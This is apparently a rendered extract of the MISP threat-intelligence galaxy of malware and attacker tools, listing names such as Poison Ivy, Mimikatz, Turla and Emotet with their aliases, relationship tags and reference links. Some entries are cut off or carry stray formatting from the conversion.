The tag is: *misp-galaxy:tool=*MSUpdater*
Lazagne

A password stealing tool regularly used by attackers

The tag is: `misp-galaxy:tool="Lazagne"`

Poison Ivy

Poison Ivy is a RAT which was freely available and first released in 2005.

The tag is: `misp-galaxy:tool="Poison Ivy"`

Poison Ivy is also known as:

- Backdoor.Win32.PoisonIvy
- Gen:Trojan.Heur.PT

Poison Ivy has relationships with:

- used-by: `misp-galaxy:threat-actor="Anchor Panda"` with `estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:rat="PoisonIvy"` with `estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:mitre-malware="PoisonIvy - S0012"` with `estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:malpedia="Poison Ivy"` with `estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:tool="poisonivy"` with `estimative-language:likelihood-probability="likely"

SPIVY

In March 2016, Unit 42 observed this new Poison Ivy variant we've named SPIVY being deployed via weaponized documents leveraging CVE-2015-2545.
The tag is: misp-galaxy:tool="SPIVY"

Table 6250. Table References

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Torn RAT

The tag is: misp-galaxy:tool="Torn RAT"

Torn RAT is also known as:

- Anchor Panda

Torn RAT has relationships with:

- used-by: misp-galaxy:threat-actor="Anchor Panda" with estimative-language:likelihood-probability="likely"

Table 6251. Table References

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<tr>
<td><a href="https://www.crowdstrike.com/blog/whois-anchor-panda/">https://www.crowdstrike.com/blog/whois-anchor-panda/</a></td>
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OzoneRAT

The tag is: misp-galaxy:tool="OzoneRAT"

OzoneRAT is also known as:

- Ozone RAT
- ozonercp

Table 6252. Table References

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ZeGhost

ZeGhost is a RAT which was freely available and first released in 2014.

The tag is: misp-galaxy:tool="ZeGhost"

ZeGhost is also known as:

- BackDoor-FBZT!52D84425CDF2
Elise Backdoor

Trojan (RAT) linked to current targeted attacks and others dating back to at least early 2009

The tag is: `misp-galaxy:tool="Elise Backdoor"

Elise Backdoor is also known as:

- Elise

Elise Backdoor has relationships with:

- similar: `misp-galaxy:mitre-malware="Elise - S0081"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:malpedia="Elise"` with estimative-language:likelihood-probability="likely"

Trojan.Laziok

A new information stealer, Trojan.Laziok, acts as a reconnaissance tool allowing attackers to gather information and tailor their attack methods for each compromised computer.

The tag is: `misp-galaxy:tool="Trojan.Laziok"

Trojan.Laziok is also known as:

- Laziok

Trojan.Laziok has relationships with:

- similar: `misp-galaxy:malpedia="Laziok"` with estimative-language:likelihood-probability="likely"
Slempo

Android-based malware

The tag is: misp-galaxy:tool="Slempo"

Slempo is also known as:

- GM-Bot
- SlemBunk
- Bankosy
- Acecard

Slempo has relationships with:

- similar: misp-galaxy:android="GM Bot" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:android="Bankosy" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Slempo" with estimative-language:likelihood-probability="likely"

Table 6256. Table References

Links


PWOBot

We have discovered a malware family named ‘PWOBot’ that is fairly unique because it is written entirely in Python, and compiled via PyInstaller to generate a Microsoft Windows executable. The malware has been witnessed affecting a number of Europe-based organizations, particularly in Poland. Additionally, the malware is delivered via a popular Polish file-sharing web service.

The tag is: misp-galaxy:tool="PWOBot"

PWOBot is also known as:

- PWOLauncher
- PWOHTTPD
- PWOKeyLogger
- PWOMiner
- PWOPyExec
Lost Door RAT

We recently came across a cyber attack that used a remote access Trojan (RAT) called Lost Door, a tool currently offered on social media sites. What also struck us the most about this RAT (detected as BKDR_LODORAT.A) is how it abuses the Port Forward feature in routers.

The tag is: misp-galaxy:tool="Lost Door RAT"

Lost Door RAT is also known as:

- LostDoor RAT
- BKDR_LODORAT

njRAT

The tag is: misp-galaxy:tool="njRAT"

njRAT is also known as:

- Bladabindi
- Jorik

njRAT has relationships with:

- similar: misp-galaxy:malpedia="NjRAT" with estimative-language:likelihood-probability="likely"
**NanoCoreRAT**

The tag is: `misp-galaxy:tool="NanoCoreRAT"`

NanoCoreRAT is also known as:

- NanoCore
- Nancrat
- Zurten
- Atros2.CKPN

NanoCoreRAT has relationships with:

- similar: `misp-galaxy:rat="NanoCore"` with `estimative-language:likelihood-probability="likely"`

*Table 6260. Table References*

<table>
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<tbody>
<tr>
<td><a href="https://nanocore.io/">https://nanocore.io/</a></td>
</tr>
</tbody>
</table>

**Sakula**

The tag is: `misp-galaxy:tool="Sakula"`

Sakula is also known as:

- Sakurel

Sakula has relationships with:

- similar: `misp-galaxy:rat="Sakula"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:mitre-malware="Sakula - S0074"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:malpedia="Sakula RAT"` with `estimative-language:likelihood-probability="likely"`

*Table 6261. Table References*

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<thead>
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<th>Links</th>
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<tbody>
<tr>
<td><a href="https://www.secureworks.com/research/sakula-malware-family">https://www.secureworks.com/research/sakula-malware-family</a></td>
</tr>
</tbody>
</table>

**Hi-ZOR**

The tag is: `misp-galaxy:tool="Hi-ZOR"`

*Table 6262. Table References*
Derusbi

The tag is: misp-galaxy:tool="Derusbi"

Derusbi is also known as:

- TROJ_DLLSERV.BE

Derusbi has relationships with:

- similar: misp-galaxy:mitre-malware="Derusbi - S0021" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Derusbi" with estimative-language:likelihood-probability="likely"

Table 6263. Table References

EvilGrab

The tag is: misp-galaxy:tool="EvilGrab"

EvilGrab is also known as:

- BKDR_HGDER
- BKDR_EVLOGE
- BKDR_NVICM
- Wmonder

EvilGrab has relationships with:

- similar: misp-galaxy:mitre-malware="EvilGrab - S0152" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="EvilGrab" with estimative-language:likelihood-probability="likely"

Table 6264. Table References
Trojan.Naid

The tag is: `misp-galaxy:tool="Trojan.Naid"`

Trojan.Naid is also known as:

- Naid
- Mdmbot.E
- AGENT.GUNZ
- AGENT.AQUP.DROPPER
- AGENT.BMZA
- MCRAT.A
- AGENT.ABQMR

Trojan.Naid has relationships with:

- similar: `misp-galaxy:mitre-malware="Naid - S0205"` with estimative-language:likelihood-probability="likely"

Table 6265. Table References

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<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://telussecuritylabs.com/threats/show/TSL20120614-05">http://telussecuritylabs.com/threats/show/TSL20120614-05</a></td>
</tr>
</tbody>
</table>

Moudoor

Backdoor.Moudoor, a customized version of Gh0st RAT

The tag is: `misp-galaxy:tool="Moudoor"`

Moudoor is also known as:

- SCAR
- KillProc.14145

Table 6266. Table References

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NetTraveler

APT that infected hundreds of high profile victims in more than 40 countries. Known targets of NetTraveler include Tibetan/Uyghur activists, oil industry companies, scientific research centers and institutes, universities, private companies, governments and governmental institutions, embassies and military contractors.

The tag is: *misp-galaxy:tool="NetTraveler"

NetTraveler is also known as:

- TravNet
- Netfile

NetTraveler has relationships with:

- similar: *misp-galaxy:mitre-malware="NetTraveler - S0033" with estimative-language:likelihood-probability="likely"
- similar: *misp-galaxy:malpedia="NetTraveler" with estimative-language:likelihood-probability="likely"

Table 6267. Table References

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<thead>
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<tbody>
<tr>
<td><a href="https://securelist.com/blog/incidents/57455/nettraveler-is-back-the-red-star-apt-returns-with-new-tricks/">https://securelist.com/blog/incidents/57455/nettraveler-is-back-the-red-star-apt-returns-with-new-tricks/</a></td>
</tr>
</tbody>
</table>

Winnti

APT used As part of Operation SMN, Novetta analyzed recent versions of the Winnti malware. The samples, compiled from mid- to late 2014, exhibited minimal functional changes over the previous generations Kaspersky reported in 2013.

The tag is: *misp-galaxy:tool="Winnti"

Winnti is also known as:

- Etso
- SUQ
- Agent.ALQHI
- RbDoor
- RibDoor
HIGHNOON

Winnti has relationships with:

- similar: misp-galaxy:mitre-malware="Winnti for Windows - S0141" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Winnti (Windows)" with estimative-language:likelihood-probability="likely"

Table 6268. Table References

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Mimikatz

Ease Credential stealth and replay, A little tool to play with Windows security.

The tag is: misp-galaxy:tool="Mimikatz"

Mimikatz is also known as:

- Mikatz

Mimikatz has relationships with:

- similar: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="likely"

Table 6269. Table References

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<tbody>
<tr>
<td><a href="https://github.com/gentilkiwi/mimikatz">https://github.com/gentilkiwi/mimikatz</a></td>
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</tbody>
</table>

WEBC2

Backdoor attributed to APT1

The tag is: misp-galaxy:tool="WEBC2"

WEBC2 has relationships with:
Pirpi

Symantec has observed Buckeye activity dating back to 2009, involving attacks on various organizations in several regions. Buckeye used a remote access Trojan (Backdoor.Pirpi) in attacks against a US organization’s network in 2009. The group delivered Backdoor.Pirpi through malicious attachments or links in convincing spear-phishing emails.

The tag is: \texttt{misp-galaxy:tool=\textquote{Pirpi}}

Pirpi is also known as:

- Badey
- EXL

Pirpi has relationships with:

- similar: \texttt{misp-galaxy:mitre-malware=\textquote{SHOTPUT - S0063}} with \texttt{estimative-language:likelihood-probability=\textquote{likely}}

RARSTONE

RARSTONE is a Remote Access Tool (RAT) discovered early 2013 by TrendMicro, it’s characterized by a great affinity with the other RAT know as Plug is and was used in April for phishing campaigns that followed the dramatic attack to the Boston Marathon.

The tag is: \texttt{misp-galaxy:tool=\textquote{RARSTONE}}

RARSTONE has relationships with:

- similar: \texttt{misp-galaxy:mitre-malware=\textquote{RARSTONE - S0055}} with \texttt{estimative-language:likelihood-probability=\textquote{likely}}
Backspace

Backspace is a Backdoor that targets the Windows platform. This malware is reportedly associated with targeted attacks against Association of Southeast Asian Nations (ASEAN) members (APT30).

The tag is: `misp-galaxy:tool="Backspace"`

Backspace is also known as:

- Lecna

Backspace has relationships with:

- similar: `misp-galaxy:mitre-malware="BACKSPACE - S0031"` with `estimative-language:likelihood-probability="likely"`

Table 6273. Table References

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XSControl

Backdoor user by the Naikon APT group

The tag is: `misp-galaxy:tool="XSControl"`

Table 6274. Table References

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<tbody>
<tr>
<td><a href="https://securelist.com/analysis/publications/69953/the-naikon-apt/">https://securelist.com/analysis/publications/69953/the-naikon-apt/</a></td>
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<tr>
<td><a href="https://kasperskycontenthub.com/securelist/files/2015/05/TheNaikonAPT-MsnMM.pdf">https://kasperskycontenthub.com/securelist/files/2015/05/TheNaikonAPT-MsnMM.pdf</a></td>
</tr>
</tbody>
</table>

Neteagle

NETEAGLE is a backdoor developed by APT30 with compile dates as early as 2008. It has two main variants known as Scout and Norton.

The tag is: `misp-galaxy:tool="Neteagle"`

Neteagle is also known as:

- scout
- norton
Agent.BTZ

In November 2014, the experts of the G DATA SecurityLabs published an article about ComRAT, the Agent.BTZ successor. We explained that this case is linked to the Uroburos rootkit.

The tag is: `misp-galaxy:tool="Agent.BTZ"`

Agent.BTZ is also known as:

• ComRat

Agent.BTZ has relationships with:

• similar: `misp-galaxy:rat="ComRAT"` with `estimative-language:likelihood-probability="likely"`
• similar: `misp-galaxy:mitre-malware="ComRAT - S0126"` with `estimative-language:likelihood-probability="likely"`
• similar: `misp-galaxy:malpedia="Agent.BTZ"` with `estimative-language:likelihood-probability="likely"

Heseber BOT

RAT bundle with standard VNC (to avoid/limit A/V detection).

The tag is: `misp-galaxy:tool="Heseber BOT"`

Agent.dne

The tag is: `misp-galaxy:tool="Agent.dne"

Wipbot

Waterbug is the name given to the actors who use the malware tools Trojan.Wipbot (also known as Tavdig and Epic Turla)

The tag is: `misp-galaxy:tool="Wipbot"`
Wipbot is also known as:

- Tavdig
- Epic Turla
- WorldCupSec
- TadjMakhal

Wipbot has relationships with:

- similar: misp-galaxy:mitre-malware="Epic - S0091" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Wipbot" with estimative-language:likelihood-probability="likely"

**Table 6277. Table References**

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<tr>
<td><a href="https://securelist.com/analysis/publications/65545/the-epic-turla-operation/">https://securelist.com/analysis/publications/65545/the-epic-turla-operation/</a></td>
</tr>
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</table>

**Turla**

Family of related sophisticated backdoor software - Name comes from Microsoft detection signature – anagram of Ultra (Ultra3) was a name of the fake driver). A macOS version exists but appears incomplete and lacking features...for now!

The tag is: misp-galaxy:tool="Turla"

Turla is also known as:

- Snake
- Uroburos
- Urouros

Turla has relationships with:

- similar: misp-galaxy:mitre-malware="Uroburos - S0022" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Uroburos (Windows)" with estimative-language:likelihood-probability="likely"

**Table 6278. Table References**

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Winexe

The tag is: `misp-galaxy:tool="Winexe"`

Winexe has relationships with:

• similar: `misp-galaxy:mitre-tool="Winexe - S0191"` with `estimative-language:likelihood-probability="likely"`

Dark Comet

RAT initially identified in 2011 and still actively used.

The tag is: `misp-galaxy:tool="Dark Comet"`

Dark Comet has relationships with:

• similar: `misp-galaxy:rat="DarkComet"` with `estimative-language:likelihood-probability="likely"`
• similar: `misp-galaxy:malpedia="DarkComet"` with `estimative-language:likelihood-probability="likely"`

Cadelspy

The tag is: `misp-galaxy:tool="Cadelspy"`

Cadelspy is also known as:

• WinSpy

CMStar

The tag is: `misp-galaxy:tool="CMStar"`

DHS2015

The tag is: `misp-galaxy:tool="DHS2015"`

DHS2015 is also known as:

• iRAT

Table 6279. Table References

Links

**Gh0st Rat**

Gh0st Rat is a well-known Chinese remote access trojan which was originally made by C.Rufus Security Team several years ago.

The tag is: *misp-galaxy:tool=*"Gh0st Rat"

Gh0st Rat is also known as:

- Gh0stRat, GhostRat

Gh0st Rat has relationships with:

- used-by: misp-galaxy:threat-actor="Anchor Panda" with estimative-language:likelihood-probability="likely"

**Fakem RAT**

Fakem RAT makes their network traffic look like well-known protocols (e.g. Messenger traffic, HTML pages).

The tag is: *misp-galaxy:tool=*"Fakem RAT"

Fakem RAT is also known as:

- FAKEM

Fakem RAT has relationships with:

- similar: misp-galaxy:malpedia="Terminator RAT" with estimative-language:likelihood-probability="likely"
MFC Huner

The tag is: misp-galaxy:tool="MFC Huner"

MFC Huner is also known as:

• Hupigon
• BKDR_HUPIGON

Blackshades

Blackshades Remote Access Tool targets Microsoft Windows operating systems. Authors were arrested in 2012 and 2014.

The tag is: misp-galaxy:tool="Blackshades"

Blackshades has relationships with:

• similar: misp-galaxy:rat="Blackshades" with estimative-language:likelihood-probability="likely"

CHOPSTICK

backdoor used by apt28

The tag is: misp-galaxy:tool="CHOPSTICK"

CHOPSTICK is also known as:

• webhp
• SPLM
• (.v2 fysbis)

CHOPSTICK has relationships with:

• similar: misp-galaxy:mitre-malware="CHOPSTICK - S0023" with estimative-language:likelihood-
EVILTOSS

backdoor used by apt28

Sedreco serves as a spying backdoor; its functionalities can be extended with dynamically loaded plugins. It is made up of two distinct components: a dropper and the persistent payload installed by this dropper. We have not seen this component since April 2016.

The tag is: `misp-galaxy:tool="EVILTOSS"`

EVILTOSS is also known as:

- Sedreco
- AZZY
- ADVSTORESHELL
- NETUI

EVILTOSS has relationships with:

- similar: `misp-galaxy:mitre-malware="ADVSTORESHELL - S0045"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:malpedia="Sedreco"` with estimative-language:likelihood-probability="likely"

GAMEFISH

backdoor

The tag is: `misp-galaxy:tool="GAMEFISH"`
GAMEFISH is also known as:

- Sednit
- Seduploader
- JHUHUGIT
- Sofacy

GAMEFISH has relationships with:

- similar: misp-galaxy:mitre-malware="JHUHUGIT - S0044" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:android="Sofacy" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:tool="SOURFACE" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:tool="CORESHELL" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:mitre-malware="Komplex - S0162" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Komplex" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Seduploader" with estimative-language:likelihood-probability="likely"

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**SOURFACE**

downloader - Older version of CORESHELL

The tag is: *misp-galaxy:tool="SOURFACE"*

SOURFACE is also known as:

- Sofacy

SOURFACE has relationships with:

- similar: misp-galaxy:mitre-malware="CORESHELL - S0137" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:tool="CORESHELL" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:android="Sofacy" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:mitre-malware="JHUHUGIT - S0044" with estimative-language:likelihood-probability="likely"
probability="likely"

• similar: misp-galaxy:tool="GAMEFISH" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:mitre-malware="Komplex - S0162" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:malpedia="Komplex" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:malpedia="Seduploader" with estimative-language:likelihood-probability="likely"

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**OLDBAIT**

credential harvester

The tag is: misp-galaxy:tool="OLDBAIT"

OLDBAIT is also known as:

• Sasfis

• BackDoor-FDU

• IEChecker

OLDBAIT has relationships with:

• similar: misp-galaxy:mitre-malware="OLDBAIT - S0138" with estimative-language:likelihood-probability="likely"

Table 6289. Table References

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**CORESHELL**

downloader - Newer version of SOURFACE

The tag is: misp-galaxy:tool="CORESHELL"

CORESHELL is also known as:

• Sofacy
CORESHELL has relationships with:

- similar: misp-galaxy:mitre-malware="CORESHELL - S0137" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:tool="SOURFACE" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:android="Sofacy" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:mitre-malware="JHUHUGIT - S0044" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:tool="GAMEFISH" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:mitre-malware="Komplex - S0162" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Komplex" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Seduploader" with estimative-language:likelihood-probability="likely"

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**Havex RAT**

The tag is: *misp-galaxy:tool="Havex RAT"*

Havex RAT is also known as:

- Havex

Havex RAT has relationships with:

- similar: misp-galaxy:mitre-malware="Backdoor.Oldrea - S0093" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Havex RAT" with estimative-language:likelihood-probability="likely"

**KjW0rm**

RAT initially written in VB.

The tag is: *misp-galaxy:tool="KjW0rm"*

KjW0rm has relationships with:

- similar: misp-galaxy:rat="KjW0rm" with estimative-language:likelihood-probability="likely"
TinyTyphon

The tag is: `misp-galaxy:tool="TinyTyphon"`

TinyTyphon has relationships with:

• similar: `misp-galaxy:malpedia="TinyTyphon"` with `estimative-language:likelihood-probability="likely"`

Badnews

The tag is: `misp-galaxy:tool="Badnews"`

LURK

The tag is: `misp-galaxy:tool="LURK"`

Oldrea

The tag is: `misp-galaxy:tool="Oldrea"`

AmmyAdmin

The tag is: `misp-galaxy:tool="AmmyAdmin"`

Matryoshka

The tag is: `misp-galaxy:tool="Matryoshka"`

Matryoshka has relationships with:

• similar: `misp-galaxy:rat="Matryoshka"` with `estimative-language:likelihood-probability="likely"`

TinyZBot

The tag is: `misp-galaxy:tool="TinyZBot"`

TinyZBot has relationships with:

• similar: `misp-galaxy:mitre-malware="TinyZBot - S0004"` with `estimative-language:likelihood-probability="likely"`
GHOLE

The tag is: misp-galaxy:tool="GHOLE"

CWooolger

The tag is: misp-galaxy:tool="CWooolger"

FireMalv

The tag is: misp-galaxy:tool="FireMalv"

FireMalv has relationships with:

- similar: misp-galaxy:malpedia="FireMalv" with estimative-language:likelihood-probability="likely"

Regin

Regin (also known as Prax or WarriorPride) is a sophisticated malware toolkit revealed by Kaspersky Lab, Symantec, and The Intercept in November 2014. The malware targets specific users of Microsoft Windows-based computers and has been linked to the US intelligence gathering agency NSA and its British counterpart, the GCHQ. The Intercept provided samples of Regin for download including malware discovered at Belgian telecommunications provider, Belgacom. Kaspersky Lab says it first became aware of Regin in spring 2012, but that some of the earliest samples date from 2003. The name Regin is first found on the VirusTotal website on 9 March 2011.

The tag is: misp-galaxy:tool="Regin"

Regin is also known as:

- Prax
- WarriorPride

Regin has relationships with:

- similar: misp-galaxy:mitre-malware="Regin - S0019" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Regin" with estimative-language:likelihood-probability="likely"

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Duqu
The tag is: `misp-galaxy:tool="Duqu"`

Duqu has relationships with:

- similar: `misp-galaxy:mitre-malware="Duqu - S0038"` with `estimative-language:likelihood-probability="likely"`

Flame
The tag is: `misp-galaxy:tool="Flame"`

Flame has relationships with:

- similar: `misp-galaxy:mitre-malware="Flame - S0143"` with `estimative-language:likelihood-probability="likely"`

Stuxnet
The tag is: `misp-galaxy:tool="Stuxnet"`

Stuxnet has relationships with:

- similar: `misp-galaxy:malpedia="Stuxnet"` with `estimative-language:likelihood-probability="likely"`

EquationLaser
The tag is: `misp-galaxy:tool="EquationLaser"`

EquationDrug
The tag is: `misp-galaxy:tool="EquationDrug"`

EquationDrug has relationships with:

- similar: `misp-galaxy:malpedia="EquationDrug"` with `estimative-language:likelihood-probability="likely"`

DoubleFantasy
The tag is: `misp-galaxy:tool="DoubleFantasy"`

TripleFantasy
The tag is: `misp-galaxy:tool="TripleFantasy"`
Fanny
The tag is: misp-galaxy:tool="Fanny"
Fanny has relationships with:
  • similar: misp-galaxy:malpedia="Fanny" with estimative-language:likelihood-probability="likely"

GrayFish
The tag is: misp-galaxy:tool="GrayFish"

Babar
The tag is: misp-galaxy:tool="Babar"
Babar has relationships with:
  • similar: misp-galaxy:malpedia="Babar" with estimative-language:likelihood-probability="likely"

Bunny
The tag is: misp-galaxy:tool="Bunny"

Casper
The tag is: misp-galaxy:tool="Casper"
Casper has relationships with:
  • similar: misp-galaxy:malpedia="Casper" with estimative-language:likelihood-probability="likely"

NBot
The tag is: misp-galaxy:tool="NBot"

Tafacalou
The tag is: misp-galaxy:tool="Tafacalou"

Tdrop
The tag is: misp-galaxy:tool="Tdrop"
**Troy**

The tag is: `misp-galaxy:tool="Troy"`

**Tdrop2**

The tag is: `misp-galaxy:tool="Tdrop2"`

**ZXShell**

ZXShell is a remote access trojan (RAT). It was developed in 2006 by the persona "LZX", who then publicly released the source code in 2007

The tag is: `misp-galaxy:tool="ZXShell"`

ZXShell is also known as:

- Sensode

ZXShell has relationships with:

- similar: `misp-galaxy:malpedia="ZXShell"` with `estimative-language:likelihood-probability="likely"

**Table 6293. Table References**

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<tr>
<td><a href="https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox">https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox</a></td>
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**T9000**

The tag is: `misp-galaxy:tool="T9000"`

T9000 has relationships with:

- similar: `misp-galaxy:mitre-malware="T9000 - S0098"` with `estimative-language:likelihood-probability="likely"

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**T5000**

The tag is: `misp-galaxy:tool="T5000"`

T5000 is also known as:

- Plat1

Table 6295. Table References

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**Taidoor**

The tag is: `misp-galaxy:tool="Taidoor"`

Taidoor has relationships with:

- similar: `misp-galaxy:mitre-malware="Taidoor - S0011"` with `estimative-language:likelihood-probability="likely"`

Table 6296. Table References

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**Swisyn**

The tag is: `misp-galaxy:tool="Swisyn"`

Table 6297. Table References

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**Rekaf**

The tag is: `misp-galaxy:tool="Rekaf"`

Table 6298. Table References

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<th>Links</th>
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</table>
**Scieron**

The tag is: `misp-galaxy:tool="Scieron"

**SkeletonKey**

The tag is: `misp-galaxy:tool="SkeletonKey"

*Table 6299. Table References*

<table>
<thead>
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<tbody>
<tr>
<td><a href="http://www.secureworks.com/cyber-threat-intelligence/threats/skeleton-key-malware-analysis/">http://www.secureworks.com/cyber-threat-intelligence/threats/skeleton-key-malware-analysis/</a></td>
</tr>
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</table>

**Skyipot**

The tag is: `misp-galaxy:tool="Skyipot"

*Table 6300. Table References*

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**Spindest**

The tag is: `misp-galaxy:tool="Spindest"

*Table 6301. Table References*

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**Preshin**

The tag is: `misp-galaxy:tool="Preshin"

**Oficla**

The tag is: `misp-galaxy:tool="Oficla"

Oficla has relationships with:

- similar: `misp-galaxy:botnet="BredoLab"` with `estimative-language:likelihood-probability="likely"`
PCClient RAT

The tag is: misp-galaxy:tool="PCClient RAT"

Table 6302. Table References

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Plexor

The tag is: misp-galaxy:tool="Plexor"

Mongall

The tag is: misp-galaxy:tool="Mongall"

Table 6303. Table References

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</table>

NeD Worm

The tag is: misp-galaxy:tool="NeD Worm"

NeD Worm has relationships with:

• similar: misp-galaxy:mitre-malware="DustySky - S0062" with estimative-language:likelihood-probability="likely"

Table 6304. Table References

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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://www.clearskysec.com/dustysky/">http://www.clearskysec.com/dustysky/</a></td>
</tr>
</tbody>
</table>

NewCT

The tag is: misp-galaxy:tool="NewCT"

NewCT has relationships with:

• similar: misp-galaxy:malpedia="NewCT" with estimative-language:likelihood-probability="likely"

Table 6305. Table References
Nflog
The tag is: `misp-galaxy:tool="Nflog"`

Janicab
The tag is: `misp-galaxy:tool="Janicab"`

Janicab has relationships with:

- similar: `misp-galaxy:mitre-malware="Janicab - S0163"` with `estimative-language:likelihood-probability="likely"`

Jripbot
The tag is: `misp-galaxy:tool="Jripbot"`

Jripbot is also known as:

- Jiripbot

Jolob
The tag is: `misp-galaxy:tool="Jolob"`

Jolob has relationships with:
• similar: misp-galaxy:malpedia="Jolob" with estimative-language:likelihood-probability="likely"

Table 6309. Table References

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**IsSpace**

The tag is: *misp-galaxy:tool="IsSpace"*

IsSpace has relationships with:

• similar: misp-galaxy:malpedia="IsSpace" with estimative-language:likelihood-probability="likely"

Table 6310. Table References

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</table>

**Emotet**

The tag is: *misp-galaxy:tool="Emotet"*

Emotet is also known as:

• Geodo

Emotet has relationships with:

• similar: misp-galaxy:banker="Geodo" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:malpedia="Emotet" with estimative-language:likelihood-probability="likely"

Table 6311. Table References

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<tr>
<td><a href="https://www.forcepoint.com/blog/security-labs/thanks-giving-emotet">https://www.forcepoint.com/blog/security-labs/thanks-giving-emotet</a></td>
</tr>
</tbody>
</table>
**Hoardy**

The tag is: `misp-galaxy:tool="Hoardy"`

Hoardy is also known as:

- Hoarde
- Phindolp
- BS2005

Hoardy has relationships with:

- similar: `misp-galaxy:mitre-malware="BS2005 - S0014"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:malpedia="BS2005"` with `estimative-language:likelihood-probability="likely"

**Htran**

HUC Packet Transmitter (HTran) is a proxy tool, used to intercept and redirect Transmission Control Protocol (TCP) connections from the local host to a remote host. This makes it possible to obfuscate an attacker's communications with victim networks. The tool has been freely available on the internet since at least 2009. HTran facilitates TCP connections between the victim and a hop point controlled by an attacker. Malicious cyber actors can use this technique to redirect their packets through multiple compromised hosts running HTran, to gain greater access to hosts in a network.

The tag is: `misp-galaxy:tool="Htran"`

Htran is also known as:

- HUC Packet Transmitter
- HTran

**Table References**

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<tr>
<td><a href="https://github.com/nccgroup/Royal_APT">https://github.com/nccgroup/Royal_APT</a></td>
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**Table References**

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</table>
HTTPBrowser

The tag is: misp-galaxy:tool="HTTPBrowser"

HTTPBrowser is also known as:

- TokenControl

HTTPBrowser has relationships with:

- similar: misp-galaxy:mitre-malware="HTTPBrowser - S0070" with estimative-language:likelihood-probability="likely"

Disgufa

The tag is: misp-galaxy:tool="Disgufa"

Elirks

The tag is: misp-galaxy:tool="Elirks"

Elirks has relationships with:

- similar: misp-galaxy:malpedia="Elirks" with estimative-language:likelihood-probability="likely"

Snifula

The tag is: misp-galaxy:tool="Snifula"

Snifula is also known as:

- Ursnif

Snifula has relationships with:

- similar: misp-galaxy:banker="Gozi" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Gozi" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Snifula" with estimative-language:likelihood-probability="likely"

Table 6314. Table References

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Table 6315. Table References

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Aumlib

The tag is: misp-galaxy:tool="Aumlib"

Aumlib is also known as:

- Yayih
- mswab
- Grafter

Aumlib has relationships with:

- similar: misp-galaxy:malpedia="Graftor" with estimative-language:likelihood-probability="likely"

Table 6316. Table References

Links


CTRat

The tag is: misp-galaxy:tool="CTRat"

Table 6317. Table References

Links


Emdivi

The tag is: misp-galaxy:tool="Emdivi"

Emdivi is also known as:

- Newsripper

Emdivi has relationships with:

- similar: misp-galaxy:malpedia="Emdivi" with estimative-language:likelihood-probability="likely"

Table 6318. Table References

Links
Etumbot

The tag is: `misp-galaxy:tool="Etumbot"`

Etumbot is also known as:

- Exploz
- Specfix
- RIPTIDE

Etumbot has relationships with:

- similar: `misp-galaxy:mitre-malware="RIPTIDE - S0003"` with estimative-language:likelihood-probability="likely"

Table 6319. Table References

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Fexel

The tag is: `misp-galaxy:tool="Fexel"`

Fexel is also known as:

- Loneagent

Fysbis

The tag is: `misp-galaxy:tool="Fysbis"`

Table 6320. Table References

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<tr>
<td><a href="http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/">http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/</a></td>
</tr>
</tbody>
</table>

Hikit

The tag is: `misp-galaxy:tool="Hikit"`

Hikit has relationships with:
Hancitor

The tag is: misp-galaxy:tool="Hancitor"

Hancitor is also known as:

• Tordal
• Chanitor
• Pony

Hancitor has relationships with:

• similar: misp-galaxy:malpedia="Hancitor" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:malpedia="Pony" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:tool="Fareit" with estimative-language:likelihood-probability="likely"

Ruckguv

The tag is: misp-galaxy:tool="Ruckguv"

Ruckguv has relationships with:

• similar: misp-galaxy:malpedia="Ruckguv" with estimative-language:likelihood-probability="likely"

HerHer Trojan

